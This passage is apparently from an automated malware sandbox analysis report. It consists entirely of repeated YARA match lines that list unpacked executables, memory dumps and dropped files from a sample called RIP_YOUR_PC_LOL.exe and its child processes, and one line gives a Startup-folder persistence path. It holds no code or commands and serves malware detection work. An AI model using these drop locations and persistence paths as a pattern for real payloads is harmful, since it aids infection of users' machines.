                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Pluto Panel.exe PID: 4236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED
                    Source: Yara matchFile source: 00000019.00000003.459495184.0000000000673000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.459275166.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.458681148.000000000067C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.458183685.0000000000660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.674377761.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.673042782.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Source: Yara matchFile source: 00000025.00000000.491609227.00000000002A2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\3.exe, type: DROPPED
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: 00000019.00000003.459495184.0000000000673000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.459275166.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.458681148.000000000067C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.458183685.0000000000660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: gay.exe PID: 1104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mediaget.exe PID: 4688, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Source: Yara matchFile source: 00000032.00000002.658863684.0000000010101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000035.00000002.705801059.0000000010101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.598333947.0000000010101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.18.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.19.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.468272297.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f19c0d.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.46b1030.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.4698e10.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.46b1030.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
